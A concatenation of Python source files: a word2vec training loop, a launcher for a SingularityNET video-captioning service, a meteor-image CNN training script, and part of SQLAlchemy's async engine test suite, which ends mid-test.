padding_index=len(idx_count),
sub_threshold=args.sample,
batch_size=args.batch_size,
num_workers=0)
optimizer = optim.SGD(model.parameters(), lr=args.lr)
#st = time.monotonic()
prev_cnt = 0
cnt = 0
for it in range(args.iter):
for batch in loader:
cnt += len(batch[0])
if cnt - prev_cnt > 10000:
with word_count_actual.get_lock():
word_count_actual.value += cnt - prev_cnt
delta = time.monotonic() - args.t_start
#print('\rtotal words: {0}, time spent: {1:.6f}, speed: {2:.6f}'.format(cnt, delta, cnt / delta) ,end='')
print('\rtotal words: {0}, time spent: {1:.6f}, speed: {2:.6f}'.format(word_count_actual.value, delta, word_count_actual.value / delta) ,end='')
prev_cnt = cnt
if args.cbow == 1:
word_idx = Variable(batch[0].cuda(), requires_grad=False)
ctx_inds = Variable(batch[1].cuda(), requires_grad=False)
ctx_lens = Variable(batch[2].cuda(), requires_grad=False)
neg_inds = Variable(batch[3].cuda(), requires_grad=False)
optimizer.zero_grad()
loss = model(word_idx, ctx_inds, ctx_lens, neg_inds)
loss.backward()
optimizer.step()
model.emb0_lookup.weight.data[args.vocab_size].fill_(0)
elif args.cbow == 0:
optimizer.zero_grad()
loss = model(batch)
loss.backward()
optimizer.step()
if __name__ == '__main__':
set_start_method('forkserver')
args = parser.parse_args()
print("Starting training using file %s" % args.train)
train_file = open(args.train)
train_file.seek(0, 2)
vars(args)['file_size'] = train_file.tell()
#word2idx, word_list, freq = build_vocab(args)
vocab_map, word_list, idx_count = build_vocab(args)
word_count_actual = mp.Value('L', 0)
model = init_net(args)
model.share_memory()
if args.cuda:
model.cuda()
vars(args)['t_start'] = time.monotonic()
processes = []
for p_id in range(args.processes):
p = mp.Process(target=train_process, args=(p_id, word_count_actual, vocab_map, idx_count, args, model))
p.start()
processes.append(p)
for p in processes:
p.join()
# output vectors
if args.cuda:
embs = model.emb0_lookup.weight.data.cpu().numpy()
else:
embs = model.emb0_lookup.weight.data.numpy()
data_producer.write_embs(args.output, word_list, embs, args.vocab_size, args.size)
print("")
print(time.monotonic() - args.t_start)
|
run_video_cap_service.py
|
import pathlib
import subprocess
import time
import os
import sys
import logging
import threading
from service import registry
logging.basicConfig(level=10, format="%(asctime)s - [%(levelname)8s] - %(name)s - %(message)s")
log = logging.getLogger("run_video_cap")
def main():
root_path = pathlib.Path(__file__).absolute().parent
# All services modules go here
service_modules = ["service.video_cap_service"]
# Removing all previous snetd .db file
os.system("rm snetd*.db")
# Call for all the services listed in service_modules
start_all_services(root_path, service_modules)
# Infinite loop to serve the services
while True:
try:
time.sleep(1)
except Exception as e:
log.error(e)
exit(0)
def start_all_services(cwd, service_modules):
"""
Loop through all service_modules and start them.
For each one, an instance of Daemon "snetd" is created.
snetd will start with configs from "snetd.config.json"
"""
try:
for i, service_module in enumerate(service_modules):
service_name = service_module.split(".")[-1]
log.info("Launching {} on port {}".format(str(registry[service_name]), service_module))
process_th = threading.Thread(target=start_service, args=(cwd, service_module))
# Bind the thread with the main() to abort it when main() exits.
process_th.daemon = True
process_th.start()
except Exception as e:
log.error(e)
return False
return True
def start_service(cwd, service_module):
"""
Starts SNET Daemon ("snetd") and the python module of the service
at the passed gRPC port.
"""
start_snetd(str(cwd))
service_name = service_module.split(".")[-1]
grpc_port = registry[service_name]["grpc"]
subprocess.Popen(
[sys.executable, "-m", service_module, "--grpc-port", str(grpc_port)],
cwd=str(cwd))
def start_snetd(cwd):
"""
Starts the Daemon "snetd":
"""
cmd = ["snetd", "serve"]
subprocess.Popen(cmd, cwd=str(cwd))
return True
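# --- Hedged illustration (not part of the original script) ---
# start_service() above looks up registry[service_name]["grpc"], so the registry
# imported from service.registry is expected to be shaped roughly like the
# mapping below; the port is a placeholder.
_example_registry_shape = {
    "video_cap_service": {"grpc": 7003},
}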
if __name__ == "__main__":
main()
|
results_2_07_code.py
|
import tensorflow as tf
from tensorflow.keras.layers import Dense, Conv2D, MaxPooling2D, Dropout, Flatten
from tensorflow.keras.optimizers import Adam
from tensorflow.keras.preprocessing.image import ImageDataGenerator
from tensorflow.keras.callbacks import Callback
import numpy as np
import matplotlib.pyplot as plt
from os.path import join
from os import listdir
import multiprocessing
from performanceMeasure import getPerformanceMeasures, plotAccuracyAndLoss
def trainCNN( ):
tf.keras.backend.clear_session()
modelNumber = 'model_2_07'
base_dir = r'C:\work_dir\meteorData\extraData_70_30'
results_dir = join(r'G:\GIEyA\TFG\meteor_classification\results_2', modelNumber)
results_dir_weights = join(results_dir, 'weights')
train_dir = join(base_dir, 'train')
validation_dir = join(base_dir, 'validation')
ImageResolution = (432, 432)
ImageResolutionGrayScale = (432, 432, 1)
# Training -> 62483 (3905x16)
# Validation -> 26780 (1673x16)
training_images = len(listdir(join(train_dir, 'meteors'))) + len(listdir(join(train_dir, 'non_meteors')))
validation_images = len(listdir(join(validation_dir, 'meteors'))) + len(listdir(join(validation_dir, 'non_meteors')))
batch_size = 20
steps_per_epoch = int(training_images / batch_size)
validation_steps = int(validation_images / batch_size)
#Rescale all images by 1./255
train_datagen = ImageDataGenerator(rescale=1.0/255)
validation_datagen = ImageDataGenerator(rescale=1.0/255.)
train_generator = train_datagen.flow_from_directory(train_dir,
batch_size=batch_size,
class_mode='binary',
color_mode='grayscale',
target_size=ImageResolution)
validation_generator = validation_datagen.flow_from_directory(validation_dir,
batch_size=batch_size,
class_mode='binary',
color_mode='grayscale',
target_size=ImageResolution)
# elu activation vs relu activation -> model_2_02 and model_2_03
# dropout evaluation: model_2_02 (dropout .3) vs model_2_06 (no dropout) vs model_2_07 (dropout .4):
model = tf.keras.models.Sequential([
Conv2D(16, (7, 7), activation='elu', input_shape=ImageResolutionGrayScale, strides=1),
Conv2D(16, (7, 7), activation='elu', input_shape=ImageResolutionGrayScale, strides=1),
MaxPooling2D(pool_size=(2, 2)),
Dropout(0.40),
Conv2D(12, (5, 5), activation='elu', kernel_initializer='he_uniform'),
Conv2D(24, (5, 5), activation='elu', kernel_initializer='he_uniform'),
Conv2D(12, (5, 5), activation='elu', kernel_initializer='he_uniform'),
MaxPooling2D(pool_size=(2, 2)),
Dropout(0.40),
Conv2D(12, (5, 5), activation='elu', kernel_initializer='he_uniform'),
Conv2D(24, (5, 5), activation='elu', kernel_initializer='he_uniform'),
Conv2D(12, (5, 5), activation='elu', kernel_initializer='he_uniform'),
MaxPooling2D(pool_size=(2, 2)),
Dropout(0.40),
Conv2D(16, (3, 3), activation='elu', kernel_initializer='he_uniform'),
Conv2D(24, (3, 3), activation='elu', kernel_initializer='he_uniform'),
Conv2D(16, (3, 3), activation='elu', kernel_initializer='he_uniform'),
MaxPooling2D(pool_size=(2, 2)),
Dropout(0.40),
Conv2D(24, (3, 3), activation='elu', kernel_initializer='he_uniform'),
Conv2D(32, (3, 3), activation='elu', kernel_initializer='he_uniform'),
Conv2D(24, (3, 3), activation='elu', kernel_initializer='he_uniform'),
MaxPooling2D(pool_size=(2, 2)),
Dropout(0.40),
Flatten(),
Dense(864, activation='elu', kernel_initializer='he_uniform'),
Dropout(0.40),
Dense(16, activation='elu', kernel_initializer='he_uniform'),
Dropout(0.30),
Dense(1, activation='sigmoid', kernel_initializer='he_uniform')
])
print(model.summary())
optimizer = Adam(learning_rate=5e-4)
model.compile(optimizer=optimizer,
loss='binary_crossentropy',
metrics=['accuracy'])
class SaveModelCallback(Callback):
def __init__(self, thresholdTrain, thresholdValid):
super(SaveModelCallback, self).__init__()
self.thresholdTrain = thresholdTrain
self.thresholdValid = thresholdValid
def on_epoch_end(self, epoch, logs=None):
if((logs.get('accuracy') >= self.thresholdTrain) and (logs.get('val_accuracy') >= self.thresholdValid)):
model.save_weights(join(results_dir_weights, modelNumber + '_acc_' + str(logs.get('accuracy'))[0:5]
+ '_val_acc_' + str(logs.get('val_accuracy'))[0:5] + '.h5'), save_format='h5')
callback_84_84 = SaveModelCallback(0.840, 0.840)
history = model.fit(train_generator,
validation_data=validation_generator,
steps_per_epoch=steps_per_epoch,
epochs=15, # Later train with more epochs if necessary
validation_steps=validation_steps,
shuffle=True,
verbose=1,
callbacks=[callback_84_84])
################################# PRINT MODEL PERFORMANCE AND GET PERFORMANCE MEASURES #################################
# Get performance measures:
getPerformanceMeasures(model, validation_dir, ImageResolution, join(results_dir, 'performance_' + modelNumber + '.txt'), threshold=0.50)
# Plot Accuracy and Loss in both train and validation sets
plotAccuracyAndLoss(history)
#########################################################################################################################
if __name__ == '__main__':
p = multiprocessing.Process(target=trainCNN)
p.start()
p.join()
|
test_engine_py3k.py
|
import asyncio
import inspect as stdlib_inspect
from sqlalchemy import Column
from sqlalchemy import create_engine
from sqlalchemy import delete
from sqlalchemy import event
from sqlalchemy import exc
from sqlalchemy import func
from sqlalchemy import inspect
from sqlalchemy import Integer
from sqlalchemy import select
from sqlalchemy import String
from sqlalchemy import Table
from sqlalchemy import testing
from sqlalchemy import text
from sqlalchemy import union_all
from sqlalchemy.ext.asyncio import async_engine_from_config
from sqlalchemy.ext.asyncio import create_async_engine
from sqlalchemy.ext.asyncio import engine as _async_engine
from sqlalchemy.ext.asyncio import exc as async_exc
from sqlalchemy.ext.asyncio import exc as asyncio_exc
from sqlalchemy.ext.asyncio.base import ReversibleProxy
from sqlalchemy.ext.asyncio.engine import AsyncConnection
from sqlalchemy.ext.asyncio.engine import AsyncEngine
from sqlalchemy.pool import AsyncAdaptedQueuePool
from sqlalchemy.testing import assertions
from sqlalchemy.testing import async_test
from sqlalchemy.testing import combinations
from sqlalchemy.testing import config
from sqlalchemy.testing import engines
from sqlalchemy.testing import eq_
from sqlalchemy.testing import expect_raises
from sqlalchemy.testing import expect_raises_message
from sqlalchemy.testing import fixtures
from sqlalchemy.testing import is_
from sqlalchemy.testing import is_false
from sqlalchemy.testing import is_none
from sqlalchemy.testing import is_not
from sqlalchemy.testing import is_true
from sqlalchemy.testing import mock
from sqlalchemy.testing import ne_
from sqlalchemy.util.concurrency import greenlet_spawn
class AsyncFixture:
@config.fixture(
params=[
(rollback, run_second_execute, begin_nested)
for rollback in (True, False)
for run_second_execute in (True, False)
for begin_nested in (True, False)
]
)
def async_trans_ctx_manager_fixture(self, request, metadata):
rollback, run_second_execute, begin_nested = request.param
from sqlalchemy import Table, Column, Integer, func, select
t = Table("test", metadata, Column("data", Integer))
eng = getattr(self, "bind", None) or config.db
t.create(eng)
async def run_test(subject, trans_on_subject, execute_on_subject):
async with subject.begin() as trans:
if begin_nested:
if not config.requirements.savepoints.enabled:
config.skip_test("savepoints not enabled")
if execute_on_subject:
nested_trans = subject.begin_nested()
else:
nested_trans = trans.begin_nested()
async with nested_trans:
if execute_on_subject:
await subject.execute(t.insert(), {"data": 10})
else:
await trans.execute(t.insert(), {"data": 10})
# for nested trans, we always commit/rollback on the
# "nested trans" object itself.
# only Session(future=False) will affect savepoint
# transaction for session.commit/rollback
if rollback:
await nested_trans.rollback()
else:
await nested_trans.commit()
if run_second_execute:
with assertions.expect_raises_message(
exc.InvalidRequestError,
"Can't operate on closed transaction "
"inside context manager. Please complete the "
"context manager "
"before emitting further commands.",
):
if execute_on_subject:
await subject.execute(
t.insert(), {"data": 12}
)
else:
await trans.execute(
t.insert(), {"data": 12}
)
# outside the nested trans block, but still inside the
# transaction block, we can run SQL, and it will be
# committed
if execute_on_subject:
await subject.execute(t.insert(), {"data": 14})
else:
await trans.execute(t.insert(), {"data": 14})
else:
if execute_on_subject:
await subject.execute(t.insert(), {"data": 10})
else:
await trans.execute(t.insert(), {"data": 10})
if trans_on_subject:
if rollback:
await subject.rollback()
else:
await subject.commit()
else:
if rollback:
await trans.rollback()
else:
await trans.commit()
if run_second_execute:
with assertions.expect_raises_message(
exc.InvalidRequestError,
"Can't operate on closed transaction inside "
"context "
"manager. Please complete the context manager "
"before emitting further commands.",
):
if execute_on_subject:
await subject.execute(t.insert(), {"data": 12})
else:
await trans.execute(t.insert(), {"data": 12})
expected_committed = 0
if begin_nested:
# begin_nested variant, we inserted a row after the nested
# block
expected_committed += 1
if not rollback:
# not rollback variant, our row inserted in the target
# block itself would be committed
expected_committed += 1
if execute_on_subject:
eq_(
await subject.scalar(select(func.count()).select_from(t)),
expected_committed,
)
else:
with subject.connect() as conn:
eq_(
await conn.scalar(select(func.count()).select_from(t)),
expected_committed,
)
return run_test
class EngineFixture(AsyncFixture, fixtures.TablesTest):
__requires__ = ("async_dialect",)
@testing.fixture
def async_engine(self):
return engines.testing_engine(asyncio=True, transfer_staticpool=True)
@testing.fixture
def async_connection(self, async_engine):
with async_engine.sync_engine.connect() as conn:
yield AsyncConnection(async_engine, conn)
@classmethod
def define_tables(cls, metadata):
Table(
"users",
metadata,
Column("user_id", Integer, primary_key=True, autoincrement=False),
Column("user_name", String(20)),
)
@classmethod
def insert_data(cls, connection):
users = cls.tables.users
connection.execute(
users.insert(),
[{"user_id": i, "user_name": "name%d" % i} for i in range(1, 20)],
)
class AsyncEngineTest(EngineFixture):
__backend__ = True
@testing.fails("the failure is the test")
@async_test
async def test_we_are_definitely_running_async_tests(self, async_engine):
async with async_engine.connect() as conn:
eq_(await conn.scalar(text("select 1")), 2)
@async_test
async def test_interrupt_ctxmanager_connection(
self, async_engine, async_trans_ctx_manager_fixture
):
fn = async_trans_ctx_manager_fixture
async with async_engine.connect() as conn:
await fn(conn, trans_on_subject=False, execute_on_subject=True)
def test_proxied_attrs_engine(self, async_engine):
sync_engine = async_engine.sync_engine
is_(async_engine.url, sync_engine.url)
is_(async_engine.pool, sync_engine.pool)
is_(async_engine.dialect, sync_engine.dialect)
eq_(async_engine.name, sync_engine.name)
eq_(async_engine.driver, sync_engine.driver)
eq_(async_engine.echo, sync_engine.echo)
@async_test
async def test_run_async(self, async_engine):
async def test_meth(async_driver_connection):
# there's no method that's guaranteed to be on every
# driver, so just stringify it and compare that to the
# outside
return str(async_driver_connection)
def run_sync_to_async(connection):
connection_fairy = connection.connection
async_return = connection_fairy.run_async(
lambda driver_connection: test_meth(driver_connection)
)
assert not stdlib_inspect.iscoroutine(async_return)
return async_return
async with async_engine.connect() as conn:
driver_connection = (
await conn.get_raw_connection()
).driver_connection
res = await conn.run_sync(run_sync_to_async)
assert not stdlib_inspect.iscoroutine(res)
eq_(res, str(driver_connection))
@async_test
async def test_engine_eq_ne(self, async_engine):
e2 = _async_engine.AsyncEngine(async_engine.sync_engine)
e3 = engines.testing_engine(asyncio=True, transfer_staticpool=True)
eq_(async_engine, e2)
ne_(async_engine, e3)
is_false(async_engine == None)
@async_test
async def test_no_attach_to_event_loop(self, testing_engine):
"""test #6409"""
import asyncio
import threading
errs = []
def go():
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
async def main():
tasks = [task() for _ in range(2)]
await asyncio.gather(*tasks)
await engine.dispose()
async def task():
async with engine.begin() as connection:
result = await connection.execute(select(1))
result.all()
try:
engine = engines.testing_engine(
asyncio=True, transfer_staticpool=False
)
asyncio.run(main())
except Exception as err:
errs.append(err)
t = threading.Thread(target=go)
t.start()
t.join()
if errs:
raise errs[0]
@async_test
async def test_connection_info(self, async_engine):
async with async_engine.connect() as conn:
conn.info["foo"] = "bar"
eq_(conn.sync_connection.info, {"foo": "bar"})
@async_test
async def test_connection_eq_ne(self, async_engine):
async with async_engine.connect() as conn:
c2 = _async_engine.AsyncConnection(
async_engine, conn.sync_connection
)
eq_(conn, c2)
async with async_engine.connect() as c3:
ne_(conn, c3)
is_false(conn == None)
@async_test
async def test_transaction_eq_ne(self, async_engine):
async with async_engine.connect() as conn:
t1 = await conn.begin()
t2 = _async_engine.AsyncTransaction._regenerate_proxy_for_target(
t1._proxied
)
eq_(t1, t2)
is_false(t1 == None)
def test_clear_compiled_cache(self, async_engine):
async_engine.sync_engine._compiled_cache["foo"] = "bar"
eq_(async_engine.sync_engine._compiled_cache["foo"], "bar")
async_engine.clear_compiled_cache()
assert "foo" not in async_engine.sync_engine._compiled_cache
def test_execution_options(self, async_engine):
a2 = async_engine.execution_options(foo="bar")
assert isinstance(a2, _async_engine.AsyncEngine)
eq_(a2.sync_engine._execution_options, {"foo": "bar"})
eq_(async_engine.sync_engine._execution_options, {})
"""
attr uri, pool, dialect, engine, name, driver, echo
methods clear_compiled_cache, update_execution_options,
execution_options, get_execution_options, dispose
"""
@async_test
async def test_proxied_attrs_connection(self, async_engine):
async with async_engine.connect() as conn:
sync_conn = conn.sync_connection
is_(conn.engine, async_engine)
is_(conn.closed, sync_conn.closed)
is_(conn.dialect, async_engine.sync_engine.dialect)
eq_(
conn.default_isolation_level, sync_conn.default_isolation_level
)
@async_test
async def test_transaction_accessor(self, async_connection):
conn = async_connection
is_none(conn.get_transaction())
is_false(conn.in_transaction())
is_false(conn.in_nested_transaction())
trans = await conn.begin()
is_true(conn.in_transaction())
is_false(conn.in_nested_transaction())
is_(trans.sync_transaction, conn.get_transaction().sync_transaction)
nested = await conn.begin_nested()
is_true(conn.in_transaction())
is_true(conn.in_nested_transaction())
is_(
conn.get_nested_transaction().sync_transaction,
nested.sync_transaction,
)
eq_(conn.get_nested_transaction(), nested)
is_(trans.sync_transaction, conn.get_transaction().sync_transaction)
await nested.commit()
is_true(conn.in_transaction())
is_false(conn.in_nested_transaction())
await trans.rollback()
is_none(conn.get_transaction())
is_false(conn.in_transaction())
is_false(conn.in_nested_transaction())
@testing.requires.queue_pool
@async_test
async def test_invalidate(self, async_engine):
conn = await async_engine.connect()
is_(conn.invalidated, False)
connection_fairy = await conn.get_raw_connection()
is_(connection_fairy.is_valid, True)
dbapi_connection = connection_fairy.dbapi_connection
await conn.invalidate()
if testing.against("postgresql+asyncpg"):
assert dbapi_connection._connection.is_closed()
new_fairy = await conn.get_raw_connection()
is_not(new_fairy.dbapi_connection, dbapi_connection)
is_not(new_fairy, connection_fairy)
is_(new_fairy.is_valid, True)
is_(connection_fairy.is_valid, False)
await conn.close()
@async_test
async def test_get_dbapi_connection_raise(self, async_connection):
with testing.expect_raises_message(
exc.InvalidRequestError,
"AsyncConnection.connection accessor is not "
"implemented as the attribute",
):
async_connection.connection
@async_test
async def test_get_raw_connection(self, async_connection):
pooled = await async_connection.get_raw_connection()
is_(pooled, async_connection.sync_connection.connection)
@async_test
async def test_isolation_level(self, async_connection):
conn = async_connection
sync_isolation_level = await greenlet_spawn(
conn.sync_connection.get_isolation_level
)
isolation_level = await conn.get_isolation_level()
eq_(isolation_level, sync_isolation_level)
await conn.execution_options(isolation_level="SERIALIZABLE")
isolation_level = await conn.get_isolation_level()
eq_(isolation_level, "SERIALIZABLE")
@testing.requires.queue_pool
@async_test
async def test_dispose(self, async_engine):
c1 = await async_engine.connect()
c2 = await async_engine.connect()
await c1.close()
await c2.close()
p1 = async_engine.pool
if isinstance(p1, AsyncAdaptedQueuePool):
eq_(async_engine.pool.checkedin(), 2)
await async_engine.dispose()
if isinstance(p1, AsyncAdaptedQueuePool):
eq_(async_engine.pool.checkedin(), 0)
is_not(p1, async_engine.pool)
@testing.requires.queue_pool
@async_test
async def test_dispose_no_close(self, async_engine):
c1 = await async_engine.connect()
c2 = await async_engine.connect()
await c1.close()
await c2.close()
p1 = async_engine.pool
if isinstance(p1, AsyncAdaptedQueuePool):
eq_(async_engine.pool.checkedin(), 2)
await async_engine.dispose(close=False)
# TODO: test that DBAPI connection was not closed
if isinstance(p1, AsyncAdaptedQueuePool):
eq_(async_engine.pool.checkedin(), 0)
is_not(p1, async_engine.pool)
@testing.requires.independent_connections
@async_test
async def test_init_once_concurrency(self, async_engine):
async with async_engine.connect() as c1, async_engine.connect() as c2:
await asyncio.wait([c1, c2])
@async_test
async def test_connect_ctxmanager(self, async_engine):
async with async_engine.connect() as conn:
result = await conn.execute(select(1))
eq_(result.scalar(), 1)
@async_test
async def test_connect_plain(self, async_engine):
conn = await async_engine.connect()
try:
result = await conn.execute(select(1))
eq_(result.scalar(), 1)
finally:
await conn.close()
@async_test
async def test_connection_not_started(self, async_engine):
conn = async_engine.connect()
testing.assert_raises_message(
asyncio_exc.AsyncContextNotStarted,
"AsyncConnection context has not been started and "
"object has not been awaited.",
conn.begin,
)
@async_test
async def test_transaction_commit(self, async_engine):
users = self.tables.users
async with async_engine.begin() as conn:
await conn.execute(delete(users))
async with async_engine.connect() as conn:
eq_(await conn.scalar(select(func.count(users.c.user_id))), 0)
@async_test
async def test_savepoint_rollback_noctx(self, async_engine):
users = self.tables.users
async with async_engine.begin() as conn:
savepoint = await conn.begin_nested()
await conn.execute(delete(users))
await savepoint.rollback()
async with async_engine.connect() as conn:
eq_(await conn.scalar(select(func.count(users.c.user_id))), 19)
@async_test
async def test_savepoint_commit_noctx(self, async_engine):
users = self.tables.users
async with async_engine.begin() as conn:
savepoint = await conn.begin_nested()
await conn.execute(delete(users))
await savepoint.commit()
async with async_engine.connect() as conn:
eq_(await conn.scalar(select(func.count(users.c.user_id))), 0)
@async_test
async def test_transaction_rollback(self, async_engine):
users = self.tables.users
async with async_engine.connect() as conn:
trans = conn.begin()
await trans.start()
await conn.execute(delete(users))
await trans.rollback()
async with async_engine.connect() as conn:
eq_(await conn.scalar(select(func.count(users.c.user_id))), 19)
@async_test
async def test_conn_transaction_not_started(self, async_engine):
async with async_engine.connect() as conn:
trans = conn.begin()
with expect_raises_message(
asyncio_exc.AsyncContextNotStarted,
"AsyncTransaction context has not been started "
"and object has not been awaited.",
):
await trans.rollback()
@testing.requires.queue_pool
@async_test
async def test_pool_exhausted_some_timeout(self, async_engine):
engine = create_async_engine(
testing.db.url,
pool_size=1,
max_overflow=0,
pool_timeout=0.1,
)
async with engine.connect():
with expect_raises(exc.TimeoutError):
await engine.connect()
@testing.requires.queue_pool
@async_test
async def test_pool_exhausted_no_timeout(self, async_engine):
engine = create_async_engine(
testing.db.url,
pool_size=1,
max_overflow=0,
pool_timeout=0,
)
async with engine.connect():
with expect_raises(exc.TimeoutError):
await engine.connect()
@async_test
async def test_create_async_engine_server_side_cursor(self, async_engine):
testing.assert_raises_message(
asyncio_exc.AsyncMethodRequired,
"Can't set server_side_cursors for async engine globally",
create_async_engine,
testing.db.url,
server_side_cursors=True,
)
def test_async_engine_from_config(self):
config = {
"sqlalchemy.url": str(testing.db.url),
"sqlalchemy.echo": "true",
}
engine = async_engine_from_config(config)
assert engine.url == testing.db.url
assert engine.echo is True
assert engine.dialect.is_async is True
class AsyncEventTest(EngineFixture):
"""The engine events all run in their normal synchronous context.
we do not provide an asyncio event interface at this time.
"""
__backend__ = True
@async_test
async def test_no_async_listeners(self, async_engine):
with testing.expect_raises_message(
NotImplementedError,
"asynchronous events are not implemented "
"at this time. Apply synchronous listeners to the "
"AsyncEngine.sync_engine or "
"AsyncConnection.sync_connection attributes.",
):
event.listen(async_engine, "before_cursor_execute", mock.Mock())
async with async_engine.connect() as conn:
with testing.expect_raises_message(
NotImplementedError,
"asynchronous events are not implemented "
"at this time. Apply synchronous listeners to the "
"AsyncEngine.sync_engine or "
"AsyncConnection.sync_connection attributes.",
):
event.listen(conn, "before_cursor_execute", mock.Mock())
@async_test
async def test_no_async_listeners_dialect_event(self, async_engine):
with testing.expect_raises_message(
NotImplementedError,
"asynchronous events are not implemented "
"at this time. Apply synchronous listeners to the "
"AsyncEngine.sync_engine or "
"AsyncConnection.sync_connection attributes.",
):
event.listen(async_engine, "do_execute", mock.Mock())
@async_test
async def test_no_async_listeners_pool_event(self, async_engine):
with testing.expect_raises_message(
NotImplementedError,
"asynchronous events are not implemented "
"at this time. Apply synchronous listeners to the "
"AsyncEngine.sync_engine or "
"AsyncConnection.sync_connection attributes.",
):
event.listen(async_engine, "checkout", mock.Mock())
@async_test
async def test_sync_before_cursor_execute_engine(self, async_engine):
canary = mock.Mock()
event.listen(async_engine.sync_engine, "before_cursor_execute", canary)
async with async_engine.connect() as conn:
sync_conn = conn.sync_connection
await conn.execute(text("select 1"))
eq_(
canary.mock_calls,
[
mock.call(
sync_conn, mock.ANY, "select 1", mock.ANY, mock.ANY, False
)
],
)
@async_test
async def test_sync_before_cursor_execute_connection(self, async_engine):
canary = mock.Mock()
async with async_engine.connect() as conn:
sync_conn = conn.sync_connection
event.listen(
async_engine.sync_engine, "before_cursor_execute", canary
)
await conn.execute(text("select 1"))
eq_(
canary.mock_calls,
[
mock.call(
sync_conn, mock.ANY, "select 1", mock.ANY, mock.ANY, False
)
],
)
@async_test
async def test_event_on_sync_connection(self, async_engine):
canary = mock.Mock()
async with async_engine.connect() as conn:
event.listen(conn.sync_connection, "begin", canary)
async with conn.begin():
eq_(
canary.mock_calls,
[mock.call(conn.sync_connection)],
)
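# Editor's note (hedged sketch): as the AsyncEventTest docstring above states, engine events
# run in their normal synchronous context, so listeners are attached to
# AsyncEngine.sync_engine (or AsyncConnection.sync_connection). The helper below illustrates
# that pattern outside the test fixtures; the aiosqlite URL is an assumption for the example only.
def _example_sync_listener_on_async_engine():
    from sqlalchemy import event
    from sqlalchemy.ext.asyncio import create_async_engine

    engine = create_async_engine("sqlite+aiosqlite://")  # assumed driver, illustration only

    def log_statement(conn, cursor, statement, parameters, context, executemany):
        # Runs synchronously inside the driver greenlet; never await in here.
        print("SQL:", statement)

    event.listen(engine.sync_engine, "before_cursor_execute", log_statement)
    return engine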
class AsyncInspection(EngineFixture):
__backend__ = True
@async_test
async def test_inspect_engine(self, async_engine):
with testing.expect_raises_message(
exc.NoInspectionAvailable,
"Inspection on an AsyncEngine is currently not supported.",
):
inspect(async_engine)
@async_test
async def test_inspect_connection(self, async_engine):
async with async_engine.connect() as conn:
with testing.expect_raises_message(
exc.NoInspectionAvailable,
"Inspection on an AsyncConnection is currently not supported.",
):
inspect(conn)
class AsyncResultTest(EngineFixture):
@async_test
async def test_no_ss_cursor_w_execute(self, async_engine):
users = self.tables.users
async with async_engine.connect() as conn:
conn = await conn.execution_options(stream_results=True)
with expect_raises_message(
async_exc.AsyncMethodRequired,
r"Can't use the AsyncConnection.execute\(\) method with a "
r"server-side cursor. Use the AsyncConnection.stream\(\) "
r"method for an async streaming result set.",
):
await conn.execute(select(users))
@async_test
async def test_no_ss_cursor_w_exec_driver_sql(self, async_engine):
async with async_engine.connect() as conn:
conn = await conn.execution_options(stream_results=True)
with expect_raises_message(
async_exc.AsyncMethodRequired,
r"Can't use the AsyncConnection.exec_driver_sql\(\) "
r"method with a "
r"server-side cursor. Use the AsyncConnection.stream\(\) "
r"method for an async streaming result set.",
):
await conn.exec_driver_sql("SELECT * FROM users")
@testing.combinations(
(None,), ("scalars",), ("mappings",), argnames="filter_"
)
@async_test
async def test_all(self, async_engine, filter_):
users = self.tables.users
async with async_engine.connect() as conn:
result = await conn.stream(select(users))
if filter_ == "mappings":
result = result.mappings()
elif filter_ == "scalars":
result = result.scalars(1)
all_ = await result.all()
if filter_ == "mappings":
eq_(
all_,
[
{"user_id": i, "user_name": "name%d" % i}
for i in range(1, 20)
],
)
elif filter_ == "scalars":
eq_(
all_,
["name%d" % i for i in range(1, 20)],
)
else:
eq_(all_, [(i, "name%d" % i) for i in range(1, 20)])
@testing.combinations(
(None,), ("scalars",), ("mappings",), argnames="filter_"
)
@async_test
async def test_aiter(self, async_engine, filter_):
users = self.tables.users
async with async_engine.connect() as conn:
result = await conn.stream(select(users))
if filter_ == "mappings":
result = result.mappings()
elif filter_ == "scalars":
result = result.scalars(1)
rows = []
async for row in result:
rows.append(row)
if filter_ == "mappings":
eq_(
rows,
[
{"user_id": i, "user_name": "name%d" % i}
for i in range(1, 20)
],
)
elif filter_ == "scalars":
eq_(
rows,
["name%d" % i for i in range(1, 20)],
)
else:
eq_(rows, [(i, "name%d" % i) for i in range(1, 20)])
@testing.combinations((None,), ("mappings",), argnames="filter_")
@async_test
async def test_keys(self, async_engine, filter_):
users = self.tables.users
async with async_engine.connect() as conn:
result = await conn.stream(select(users))
if filter_ == "mappings":
result = result.mappings()
eq_(result.keys(), ["user_id", "user_name"])
await result.close()
@async_test
async def test_unique_all(self, async_engine):
users = self.tables.users
async with async_engine.connect() as conn:
result = await conn.stream(
union_all(select(users), select(users)).order_by(
users.c.user_id
)
)
all_ = await result.unique().all()
eq_(all_, [(i, "name%d" % i) for i in range(1, 20)])
@async_test
async def test_columns_all(self, async_engine):
users = self.tables.users
async with async_engine.connect() as conn:
result = await conn.stream(select(users))
all_ = await result.columns(1).all()
eq_(all_, [("name%d" % i,) for i in range(1, 20)])
@testing.combinations(
(None,), ("scalars",), ("mappings",), argnames="filter_"
)
@async_test
async def test_partitions(self, async_engine, filter_):
users = self.tables.users
async with async_engine.connect() as conn:
result = await conn.stream(select(users))
if filter_ == "mappings":
result = result.mappings()
elif filter_ == "scalars":
result = result.scalars(1)
check_result = []
async for partition in result.partitions(5):
check_result.append(partition)
if filter_ == "mappings":
eq_(
check_result,
[
[
{"user_id": i, "user_name": "name%d" % i}
for i in range(a, b)
]
for (a, b) in [(1, 6), (6, 11), (11, 16), (16, 20)]
],
)
elif filter_ == "scalars":
eq_(
check_result,
[
["name%d" % i for i in range(a, b)]
for (a, b) in [(1, 6), (6, 11), (11, 16), (16, 20)]
],
)
else:
eq_(
check_result,
[
[(i, "name%d" % i) for i in range(a, b)]
for (a, b) in [(1, 6), (6, 11), (11, 16), (16, 20)]
],
)
@testing.combinations(
(None,), ("scalars",), ("mappings",), argnames="filter_"
)
@async_test
async def test_one_success(self, async_engine, filter_):
users = self.tables.users
async with async_engine.connect() as conn:
result = await conn.stream(
select(users).limit(1).order_by(users.c.user_name)
)
if filter_ == "mappings":
result = result.mappings()
elif filter_ == "scalars":
result = result.scalars()
u1 = await result.one()
if filter_ == "mappings":
eq_(u1, {"user_id": 1, "user_name": "name%d" % 1})
elif filter_ == "scalars":
eq_(u1, 1)
else:
eq_(u1, (1, "name%d" % 1))
@async_test
async def test_one_no_result(self, async_engine):
users = self.tables.users
async with async_engine.connect() as conn:
result = await conn.stream(
